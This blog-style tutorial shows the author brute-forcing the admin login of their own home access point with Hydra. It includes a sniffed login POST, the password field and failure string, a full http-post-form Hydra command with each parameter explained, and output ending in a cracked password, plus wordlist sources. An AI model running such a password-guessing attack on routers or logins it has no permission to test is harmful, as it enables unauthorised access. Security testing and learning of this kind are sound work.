Brute-forcing with Hydra

Hydra is a great tool for brute-forcing. With this tool it is possible to brute-force most websites and protocols.

Protocols supported:
AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, ICQ, IMAP, IRC, LDAP2, LDAP3, MS-SQL, MYSQL, NCP, NNTP, Oracle, Oracle-Listener, Oracle-SID, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, REXEC, RLOGIN, RSH, SAP/R3, SIP, SMB, SMTP, SMTP-Enum, SNMP, SOCKS5, SSH(v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Can be found here: Hydra (http://www.thc.org/thc-hydra)

I dediced to see if it possible to brute-force my home AccessPoint administation login page.
Below is what i did.
First i started to examine the login page.

Viewing the source of the login-page to see if i could find any clues, find out what authentication it uses.
Basic, form-based etc.. There are a few ways of finding this out.
Using wireshark and intercept a login session gives a LOT of useful information.
Tried to login with a password while sniffing the traffic with wireshark, the password was incorrect (as suspected), but from this information we can see what variables are used for logging in.
Analyzing the sniffer output with "Follow TCP stream" i could see the following:
 POST /login.cgi HTTP/1.1 Host: 10.10.10.10 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://10.10.10.10/login.html Content-Type: application/x-www-form-urlencoded Content-Length: 76 page=&logout=&action=submit&pws=dGVzdA%3D%3D&itsbutton1=Submit&h_language=en HTTP/1.0 200 OK Server: IP_SHARER WEB 1.0 Content-type: text/html <link href="styles.css" rel="stylesheet" type="text/css"></link><script language="Javascript" src="language_en.js"></script><script language="JavaScript" src="showmenu.js"></script><script language="Javascript" src="base64.js"></script><script language="javascript" type="text/javascript"> strHtml='<title>'+lo1+'</title>'; dw(strHtml); <!-- var wanStatus.='Up'; var helpItem .='Login'; var menuSection.=''; var menuItem.=''; var isRouter.='1' ? '1' : '0'; var.isPS..='' ? '' : '0'; var isAPmode if('vlan1' =='' || '1'=='0') { .isAPmode='1'; } else { .isAPmode='0'; } function logoutF() { .document.tF.logout.value=1; .document.tF.submit(); .return true; } function doSubmit() { document.tF.action.value = "submit"; /* encode username and password with Base64 algorithm */ if(document.tF.pws.value != "") { document.tF.pws.value = base64encode(document.tF.pws.value); } checkfw(); } function checkfw() { ..if(''=='1'){ ..newwin=window.open('chk_wait.html',"Firmware","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=yes,width=395,height=200,resizable=0"); ..newwin.focus(); } } //--> </script><form action="login.cgi" method="post" name="tF" onsubmit="doSubmit()"> <input name="page" type="hidden" /><input name="logout" type="hidden" /><input name="action" type="hidden" /><script language="javascript" type="text/javascript"> showHead(wanStatus,helpItem,isRouter,isPS); showmenu(menuSection,menuItem,isRouter,isPS,isAPmode) </script> <td class="head_bold" height="100%" valign="top" width="99%"><br />    <script language="javascript" type="text/javascript">dw(lo1);</script> <br /> <br /> <table border="0">. <tbody> <tr>... <td width="5"></td>... <td><table align="left" border="0" cellpadding="0" cellspacing="5" style="width: 480px;"><tbody> <tr><td height="41" width="69"></td><td class="body" colspan="2" height="41"><script language="javascript" type="text/javascript">dw(lo2);</script></td></tr> <tr><td width="69"></td><td width="146"></td><td width="250"></td></tr> <tr><td width="69"></td><td class="bold_body" width="146"><script language="javascript" type="text/javascript">dw(lo3);</script></td><td width="250"><input maxlength="12" name="pws" size="9" type="password" /> </td></tr> <tr><td width="69"></td><td class="more" colspan="2"><script language="javascript" type="text/javascript">dw(lo4);</script></td></tr> <tr><td width="69"></td><td colspan="2"></td></tr> <tr><td width="69"></td><td align="middle" colspan="2"><script language="javascript" type="text/javascript">strHtml='<input type="reset" name="itsbutton0" value="'+Clear+'" style="{width:120px;}" class="submitBtn" onMouseOver="window.status=\'Clear\'; return true;" onMouseOut="window.status=\'\'; return true;">  '; ..dw(strHtml); ..strHtml='<input type="submit" name="itsbutton1" value="'+Submit+'" style="{width:120px;}" class="submitBtn">'; ..dw(strHtml);</script><br /> <br /> <span style="color: red; font-family: Arial; font-size: small;"><script language="javascript" type="text/javascript">dw(wrhtpsswd)</script></span></td></tr> </tbody></table> </td></tr> </tbody></table> </td></form> <input name="h_language" type="hidden" value="en" /><script language="javascript" type="text/javascript">showTail()</script>

I was looking for what happens after the submit button was pressed and also what is sent in HTTP-POST. Found the variable pws indicating that this is used for password input.

<input maxlength="12" name="pws" size="9" type="password" /> page=&logout=&action=submit&pws=dGVzdA%3D%3D&itsbutton1=Submit&h_language=enHTTP/1.0 200 OK <input type="submit" name="itsbutton1" value="'+Submit+'" style="{width:120px;}" class="submitBtn">'; ..dw(strHtml);</script><br /> <br /> <span style="color: red; font-family: Arial; font-size: small;"><script language="javascript" type="text/javascript">dw(wrhtpsswd)</script> Found an interesting variable: "dw(wrhtpsswd)" What does this do?
As we can see the password is base64 encoded as it is sent to the AP.
We can see that the length is 9 characters, max size is 12 characters.

Next step was further analysis with Mantra to examine web content.
DOM tab is an excellent way of analyzing variables and their associations.

This parameter wrhtpsswd sounds familiar. Incorrect password...
For a successful attack with Hydra we need to know the variable that submits the password and string included with it.
We also need to know the error message sent to us when entering an incorrect password.

From wireshark output we could not clearly see the Incorrect password message, but instead the AP sends a dw(wrhtpsswd) that DOM identified as the "Incorrect Password, Please confirm your password and try again" message.

Awesome, we can now go ahead and start the attack.
hydra -l "" -P PASSWORDS.TXT -t 1 -f -v -V 10.10.10.10 http-post-form /login.cgi:"page=&logout=&action=submit&pws=^PASS^%3D&itsbutton1=Submit&h_language=en":wrhtpsswd hydra parameters:
-l "" # There is no username required
-P PASSWORDS.TXT # Password file (in base64 encoded format)
-t #How many simultanious tasks
-f # Exit after the first found password
-v / -V # Verbose. Show every password combination
IP-address # you know
http-post-form # Method used
/login.cgi # The login page of the AP
"page=&logout=&action=submit # The string sent simulating a click on Submit button &pws=^PASS^%3D&itsbutton1=Submit&h_language=en" #pws from PASS in PASSWORDS.TXT
wrhtpsswd # The string to look for in the response when an incorrect password is entered

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) [DATA] 1 task, 1 server, 11638706 login tries (l:1/p:11638706), ~11638706 tries per task [DATA] attacking service http-post-form on port 80 [VERBOSE] Resolving addresses ... done [ATTEMPT] target 10.10.10.10 - login "" - pass "Q3J1bmNo" - 1 of 11638706 [child 0] [ATTEMPT] target 10.10.10.10 - login "" - pass "IHdpbGwg" - 2 of 11638706 [child 0] [ATTEMPT] target 10.10.10.10 - login "" - pass "bm93IGdl" - 3 of 11638706 [child 0] [ATTEMPT] target 10.10.10.10 - login "" - pass "bmVyYXRl" - 4 of 11638706 [child 0] [80][www-form] host: 10.10.10.10 login: password: XXXXXXXXXX [STATUS] attack finished for 10.10.10.10 (valid pair found) 1 of 1 target successfuly completed, 1 valid password found Awesome! Mission accomplished!

Hydra can be very time consuming depending on the size of the wordlist. A lot of options you can tweak for best timing and results. Play with it. Anything is possible, if not try harder.

A good source for common password lists can be obtained from SkullSecurity.
http://www.skullsecurity.org/wiki/index.php/Passwords

If you need to create your own custom password list Crunch is the way to go.
Excellent tool also included in Backtrack distributions or download it from Sourceforge.
http://sourceforge.net/projects/crunch-wordlist/

A good how-to can be found here.
http://adaywithtape.blogspot.se/2011/05/creating-wordlists-with-crunch-v30.html


Til next time. Bye for now!

/M